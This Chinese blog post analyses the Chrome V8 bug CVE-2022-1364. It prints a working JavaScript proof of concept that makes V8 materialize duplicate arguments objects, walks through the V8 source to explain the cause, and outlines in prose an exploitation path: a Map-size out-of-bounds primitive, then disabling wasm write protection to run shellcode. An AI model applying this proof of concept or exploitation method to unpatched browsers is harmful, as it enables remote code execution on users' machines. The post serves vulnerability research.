Chrome漏洞分析与利用(十二)——issue 1315901(CVE-2022-1364)

已于 2022-11-21 10:28:37 修改
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 漏洞分析与利用 浏览器安全漏洞 网络安全 文章标签: chrome issue javascript
于 2022-10-20 17:47:21 首次发布
1
本文链接:https://blog.csdn.net/weixin_43815930/article/details/126310055
版权

POC

issue-1315901

function foo(bug) {
    function C(z) {
      Error.prepareStackTrace = function(t, B) {
        return B[z].getThis();
      };
      // Error()是为了创建Error对象,Error对象创建会
      // 调用Summarize函数重复创建对象,stack是为了执行
      // prepareStackTrace回调函数
      let p = Error().stack;
      return p;
    }
    function J() {}
    var optim = false;
    function opt (a, b){
        b.d(a,b,1);
    };
    var e = null;
    // 传入arguments对象是为了将arguments对象作为eval函数的this对象
    J.prototype.d = function (a, b){
        "use strict";
        b.a.call(arguments,b);
        return arguments[a];
    };

    J.prototype.a = function(a){
        a.b(a);
    };
    // if(s)是为了防止解优化(分支中代码行数过少也会被解优化),
    // 解优化只会调用一次TranslatedValue::GetValue函数
    // 来具体化对象,而不执行解优化步骤时每次创建Error对象
    // 都会调用一次TranslatedValue::GetValue函数也就是
    // 说每创建一次Error对象,都会创建一个新的对象
    J.prototype.b = function(b){
        b.c();
        let s = false;
        if(s){
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
            k = i*2;k = i*2;k = i*2;k = i*2;
        }
    };
    J.prototype.c = function() {
      if (optim) {
        // 创建两次Error对象
        var z = C(3);
        var p = C(3);
        e = {M: z, C: p};
      }
    };
    var a = new J();
    // jit optim
    if (bug) {
      for (var V = 0; 1E4 > V; V++) {
        opt(1, a);
      }
    }
    optim = true;
    opt(1, a);
    return e;
  }
  
  e1 = foo(false);
  // prints true.
  console.log(e1.M === e1.C); 
  e2 = foo(true);
  // should be true as above but prints false.
  console.log(e2.M === e2.C);

漏洞分析

运行POC会发现两个console.log会输出两个不一样的结果:

true
false

通过DebugPrint输出e1.M与e1.C会发现其element与对象都指向同一块内存区域

DebugPrint: 0000020B000CBC11: [JS_ARGUMENTS_OBJECT_TYPE]
 - map: 0x020b002848a9 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x020b00244041 <Object map = 0000020B002821E9>
 - elements: 0x020b000cbbfd <FixedArray[3]> [PACKED_ELEMENTS]
 - properties: 0x020b00002261 <FixedArray[0]>
 - All own properties (excluding elements): {
    0000020B00004D89: [String] in ReadOnlySpace: #length: 3 (data field 0), location: in-object
    0000020B00004361: [String] in ReadOnlySpace: #callee: 0x020b0024f2fd <AccessorPair> (const accessor descriptor), location: descriptor
    0x020b00005c0d <Symbol: Symbol.iterator>: 0x020b001c422d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x020b000cbbfd <FixedArray[3]> {
           0: 0
           1: 0x020b000cbbc9 <J map = 0000020B00287991>
           2: 1
 }
 ......
DebugPrint: 0000020B000CBC11: [JS_ARGUMENTS_OBJECT_TYPE]
 - map: 0x020b002848a9 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x020b00244041 <Object map = 0000020B002821E9>
 - elements: 0x020b000cbbfd <FixedArray[3]> [PACKED_ELEMENTS]
 - properties: 0x020b00002261 <FixedArray[0]>
 - All own properties (excluding elements): {
    0000020B00004D89: [String] in ReadOnlySpace: #length: 3 (data field 0), location: in-object
    0000020B00004361: [String] in ReadOnlySpace: #callee: 0x020b0024f2fd <AccessorPair> (const accessor descriptor), location: descriptor
    0x020b00005c0d <Symbol: Symbol.iterator>: 0x020b001c422d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x020b000cbbfd <FixedArray[3]> {
           0: 0
           1: 0x020b000cbbc9 <J map = 0000020B00287991>
           2: 1
 }
 .......

但是当输出e2.M与e2.C时,只有element指向同一块内存区域,对象则位于不同的内存区域:

DebugPrint: 0000001C0025765D: [JS_ARGUMENTS_OBJECT_TYPE] in OldSpace
 - map: 0x001c002848a9 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x001c00244041 <Object map = 0000001C002821E9>
 - elements: 0x001c000d9ec5 <FixedArray[3]> [PACKED_ELEMENTS]
 - properties: 0x001c00002261 <FixedArray[0]>
 - All own properties (excluding elements): {
    0000001C00004D89: [String] in ReadOnlySpace: #length: 3 (data field 0), location: in-object
    0000001C00004361: [String] in ReadOnlySpace: #callee: 0x001c0024f2fd <AccessorPair> (const accessor descriptor), location: descriptor
    0x001c00005c0d <Symbol: Symbol.iterator>: 0x001c001c422d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x001c000d9ec5 <FixedArray[3]> {
           0: 0
           1: 0x001c000cccb1 <J map = 0000001C00287AA9>
           2: 1
 }
......
DebugPrint: 0000001C0025768D: [JS_ARGUMENTS_OBJECT_TYPE] in OldSpace
 - map: 0x001c002848a9 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x001c00244041 <Object map = 0000001C002821E9>
 - elements: 0x001c000d9ec5 <FixedArray[3]> [PACKED_ELEMENTS]
 - properties: 0x001c00002261 <FixedArray[0]>
 - All own properties (excluding elements): {
    0000001C00004D89: [String] in ReadOnlySpace: #length: 3 (data field 0), location: in-object
    0000001C00004361: [String] in ReadOnlySpace: #callee: 0x001c0024f2fd <AccessorPair> (const accessor descriptor), location: descriptor
    0x001c00005c0d <Symbol: Symbol.iterator>: 0x001c001c422d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x001c000d9ec5 <FixedArray[3]> {
           0: 0
           1: 0x001c000cccb1 <J map = 0000001C00287AA9>
           2: 1
 }
......

通过查看POC代码会发现e1,e2中的C,M对象都是是通过C函数获取到的,C函数中通过let p = Error.stack获取到在Error.prepareStackTrace回调中返回的B[3],通过打印可知M,C均为Arguments对象
在这里插入图片描述
当代码执行到let p = Error.stack时会触发MaybeHandle<Object> ErrorUtils::FormatStackTrace函数调用,在执行该函数时会跳过if分支进入else分支执行
在这里插入图片描述
之后会先获取全局error函数对象global_error,然后从中获取到prepare_stack_trace回调函数对象
在这里插入图片描述
随后判断prepare_stack_trace是否是函数对象,之后获取scope函数参数等并将其作为参数去调用Execution::Call函数。
在这里插入图片描述
之后先通过调用SetUpForCal函数来初始化InvokeParams对象,然后将InvokeParams对象传入Invoke函数来执行回调函数。
在这里插入图片描述
在这里插入图片描述
Invoke函数会先判断param.target是否为函数对象,通过SetUpForCal函数可知param.target指向callable所以此判断条件成立
在这里插入图片描述
之后判断是否是api回调,如果是就直接去调用,此处并非API回调于是会跳过此分支
在这里插入图片描述
然后再判断是否需要ScriptContext,如果需要就为回调函数对象设置Context,在此处也不需要上下文会直接跳过此分支。
在这里插入图片描述
之后还会步过一些if分支,最终执行到以下代码处初始化上下文等内容
在这里插入图片描述
然后判断params.execution_target是否为Execution::Target::kCallable,此处满足此条件进入此分支,先通过GeneratedCode来获取回调函数的汇编代码stub_entry
在这里插入图片描述
之后通过stub_entry.Call调用回调函数。
在这里插入图片描述
在回调函数产生的JIT代码中会去调用getThis函数,此函数为builtin函数,此函数会通过frame对象中保存的信息获取到相应函数的receiver对象
在这里插入图片描述
本以为指向同一块element的ArgumentsObject对象是在getThis中生成的,但在getThis函数的执行逻辑中并未找到,再结合patch与类似的漏洞cve 2021-21195的漏洞分析,最后发现实际是在OptimizedFrame::Summarize函数中生成的,该函数在创建JSError对象过程中被调用会打包产生错误的函数及其相关对象数据。
在这里插入图片描述
Summarize函数会先获取code对象,然后根据code对象判断其kind是否为BUILTIN,如果是的话就委托给JS Frame处理,然后再获取解优化数据。
在这里插入图片描述
之后创建translated对象进行翻译并根据该对象中的frame进行迭代处理,frame的kind是否等于kUnoptimizedFunction、kJavaScriptBuiltinContinuation或者kJavaScriptBuiltinContinuationWithCatch
在这里插入图片描述
如果满足条件就会继续后续的步骤,通过前面的注释也可以看出在后续的步骤中会导致对象被多次创建
在这里插入图片描述
当在获取receiver时会去调用TranslatedValue::GetValue函数,该函数会根据kind来判断是获取还是重新构造对象
在这里插入图片描述
其中最后一个if分支是要重新构造对象的情况
在这里插入图片描述
在这里插入图片描述
通过阅读相关文档以及chromium源码可知v8在逃逸分析后会将allocate节点删除,逃逸分析这一阶段根据我个人的理解其作用大致就是保留图(Node Graph)中逃逸对象的节点删除未逃逸对象的节点,同时在google对于此漏的报告里也有提到:CVE-2022-1364: Inconsistent Object Materialization in V8,具体代码位于 EscapeAnalysisReducer::Reduce函数内,该函数负责将逃逸分析阶段的优化结果具体实施到图中,大致处理过程就是放松未逃逸的allocate分配节点,使其在图中不可达:
在这里插入图片描述
通过与turbolizer图的比较可知argument对象生成会触发allocate节点
在这里插入图片描述
在这里插入图片描述
而在经过逃逸分析阶段后会因为前面图中代码的执行导致此allocate节点将不可达变为死节点,死结点最后会在死代码分析阶段被删除。
在这里插入图片描述
而在执行EscapeAnalysisReducer::Reduce函数执行缩减之前会先执行EscapeAnalysis::Reduce函数,而该函数会去调用ReduceNode函数,ReduceNode函数函数会针对不同的节点进入不同的分支进行处理:
在这里插入图片描述
对于所有对象创建,会先进入allocate节点处理分支根据传入的所需内存大小为对象分配一个VirtualObject对象,该对象用于跟踪对象的存储与加载,argument对象也不例外,不过此处并不会具体的为分配的虚拟对象设置节点,而是先用dead节点为分配的临时内存进行初始化在后期具体的相应节点处理分支中会获取虚拟对象并为其设置具体的节点。
在这里插入图片描述
而结合patch可知存在漏洞的版本中对framestate节点没有任何处理,而在修补过后的framestate节点分支中会先将FrameStateType与Summarize函数中的frame->kind_进行同步,随后获取FrameState的输入节点StateValue节点,并使用StateValue节点初始化一个迭代器,此迭代器用于获取StateValue节点的输入节点,随后用迭代器获取相应function对象及其receiver,通过输出POC代码中Error.prepareStackTrace回调函数中的B数组内容可知其中receiver对应的就是arguments对象,而function就是argument.eval函数。
在这里插入图片描述
在这里插入图片描述
而将receiver与function对象设为逃逸是为了防止在后期的EscapeAnalysisReducer::Reduce函数中放松其allocate节点,allocate节点不被放松其分配也不会被删除,如果分配不被删除,在Summarize函数中就不会去创建对象而是直接去获取自然也就不会触发漏洞。
在这里插入图片描述
通过google的报告可知由于节点对象未被标记为逃逸而在最后被删除分配但是由于在后期解优化时还需要将其实例化所以会将其相关信息保存下来。由于POC中return arguments[a]触发的LoadElement节点操作使Element也被保存了下来而ArgumentObject因为未逃逸最后被优化删除,最终导致在TranslatedValue::GetValue函数每次运行都会创建一个同样element的ArgumentObject。
在这里插入图片描述

漏洞利用

OOB

越界方法与CVE 2021-38003利用方法一致,概括一下就是因为当Map删除元素时会将该元素key和value都写入hole并将map.size-1,当map中有一个key为hole和一个key为正常数字的元素的时候,可以删除两次key为hole的元素,当第一次删除hole key时map.size-1=1然后将hole key与hole value写入,当第二次删除hole key时map.size将为0,当删除key为正常数字的元素时map.size就会变成0-1最终使map.size等于-1,详细说明:CVE 2021-38003

绕过WASM写保护

通过调试与查找找到FLAG_ wasm_ write_ protect_ code_ Memory标志,查看该标志的引用发现此标志与wasm可执行内存的写入权限,通过前面越界利用实现的读写原语可将此标志改写为true即可打开wasm可执行地址的写权限,然后直接写入shellcode执行即可。
在这里插入图片描述

Anansi_safe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-13720:Chrome 0-day 漏洞利用
systemino的博客
11-07 1460
摘要 Kaspersky研究人员近日发现一个Google Chrome浏览器的新的未知漏洞利用。经Google研究人员确认,是一个0 day漏洞CVE编号为CVE-2019-13720。 研究人员将相关攻击活动命名为Operation WizardOpium。目前还无法将该攻击活动与已知的攻击者联系在一起。但研究人员发现部分代码与Lazarus攻击中的代码很相似。从被攻击的站点来看,与早期D...
OpenSSL拒绝服务漏洞 (CVE-2022-0778) poc证书
03-24
下载后执行 openssl x509 -in 2022_0778.pem -inform DER -text -noout 或者在自己产品证书管理界面上传证书验证 参考https://github.com/drago-96/CVE-2022-0778 制作证书验证
【在野利用】Google Chrome V8 类型混淆漏洞(CVE-2024-5274)安全风险通告
最新发布
smellycat000的专栏
05-24 267
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Google Chrome V8 类型混淆漏洞漏洞编号QVD-2024-20506,CVE-2024-5274公开时间2024-05-24影响量级千万级奇安信评级高危CVSS 3.1分数8.8威胁类型代码执行利用可能性高POC状态未公开在野利用状态已发现EXP状态未公开技术细节状态未公开危害描述:攻击者可通过诱导用户打开恶意链接来利用此漏...
Chrome漏洞分析利用(十三)——issue-1182647(CVE 2021-21195)漏洞分析
Anansi的博客
11-25 648
由于调用了gc函数,所以在使用d8执行时需要加上–expose-gc 参数,执行后。
Chrome漏洞分析利用(三)——Issue-1062091漏洞分析
Anansi的博客
04-12 1113
漏洞环境 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。 这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,这个提交中的漏洞恰好移动到了实验版本命令行标志的后面。但是,这个更改位于Chrome 82.0.4065.0版本中,因此该漏洞Chrome稳定版本81的所有桌面平台上都是可以利用的。 环境配置 一开始打算像调试v8漏洞那样尝试用fetc
Google Chrome 开发者工具漏洞利用
weixin_33739523的博客
03-08 263
mramydnei · 2014/02/27 11:51原文链接:www.hydrantlabs.org/Security/Go…0x00 引言故事起源于 Chromium 源码里名为 InjectedScriptSource.js 的文件,这个文件负责控制台中的命令执行。也许很多人都会这么说:【Wait!为什么是 JavaScript 在负责命令执行,Chromium/Chrome 不是用 C+...
Chrome漏洞分析利用(九)——issue 1296150(cve 2022-0609)
Anansi的博客
07-08 1600
issue 1296150(CVE 202-0609) 由于此漏洞在chromium release版本下触发失败,通过查看issue页面发现崩溃产生于DCHECK(),故尝试编译debug版进行漏洞调试 安装vs,勾选以下组件其余默认,vs最好安装在默认路径否则在编译时可能出现问题,具体问题及解决办法查看v8编译。 然后设置好环境变量 使用以下方法获取指定版本chromium的源码 再使用以下方法同步源码并同时执行runhooks 使用以下方法清理目录 最后执行以下内容打开编译配置文件 在编译配置
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
更新提示!Chrome新的零日漏洞正被利用
yalin7076的博客
03-12 330
在修复了上一个零日漏洞之后,Chrome浏览器又开始马不停蹄地修复第二个零日漏洞。 3月2日,谷歌发布了Chrome浏览器第二个零日漏洞的修复程序,称该漏洞正被积极利用。 当天,谷歌发布了Windows、Mac和Linux版Chrome安全更新v89.0.4389.72,修复了 47 个漏洞,其中包括正被利用零日漏洞。 该漏洞编号为 CVE-2021-21166,由微软安全研究员 Alison Huffman 在2月11日报告的两个漏洞之一...
Chrome漏洞又出现
我的专栏
10-27 385
   一个开源的浏览器chrome由于它的漏洞百出,很多人放弃了,我也是一样,我用了一个星期后,又回来用FF,IE,看来这个CHROME来势很猛,但后来的劲真的是来足,放弃的人都明白,安全的重要性,这个我考虑过,最后用的还是IE,特别是在支付时,这并不说IE有多么的安全,起码一个成熟的浏览器比不个刚起步的还是好很多,虽然它的速度很快.   这次又曝地址欺骗的安全漏洞,使得很多人对它越来越来没有什么
Google确认Chrome存在严重漏洞,向20亿用户发出警告:你们需立即更新浏览器
2401_84253089的博客
04-15 887
而谷歌的更新提示相对于这个漏洞的严重性来说,就稍微显得有些不痛不痒了,因为大多数用户都不知道不更新的话会带来什么样的严重后果。Sophos称,即使Chrome浏览器的Chromium内核是一个开源项目,但该漏洞本身却是一个秘密。在最初的报告中,受影响的用户表示,他们尝试过多次卸载并重新启动Chrome,但仍然无法解决该问题。不过,从另一方面来说,Google选择不公开漏洞的细节,也是为了避免被潜在的黑客所利用。中已修复了这些漏洞,因此,请大家务必确保你的Chrome浏览器已经是最新的版本。
Google Chrome RCE漏洞 CVE-2020-6507 和 CVE-2024-0517 流程分析
m0_61072747的博客
04-03 666
有一个小问题,我直接使用谷歌浏览器打开这个exp.html时是没有反应的包括默认开打浏览器都不行,需要在谷歌浏览器的地址上输入exp地址才可以执行。所以这个漏洞的一个行为是值得浅析一下的,下面是我的大概一个理解。其实在另外一种思路上,如果是直接可以打开直接执行命令,那么就可以绕过谷歌浏览器的这个机制限制,当然这个思路也可能是不存在或不能实现的一种。当然还有一个就是这个漏洞的沙箱逃逸,根据以往一些国外大佬进行逃逸并未成功!
注意了!Chrome浏览器最新高危漏洞曝光
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
04-18 324
????????关注后回复“进群”,拉你进程序员交流群????????来源丨扩展迷EXTFANS4月14日,国家信息安全漏洞共享平台(CNVD)收录了Google Chrome远程代码...
Chrome浏览器爆高严重性安全漏洞
极道Jdon的技术博客
03-28 551
Google 已针对 Chrome 99 发布了紧急安全更新,以解决已存在公开利用漏洞漏洞CVE-2022-1096并被认为是高严重性的安全漏洞。是V8 JavaScript 和 WebAssembly 引擎中的类型混淆错误。 该漏洞是由一位匿名研究人员报告的,该公司尚未确定此问题的漏洞赏金金额。 谷歌已经为所有 Chrome 用户发布了一个紧急安全更新,因为它确认攻击者已经在利用一个高严重性的零日漏洞Chrome 99.0.4844.8...
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用漏洞在Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值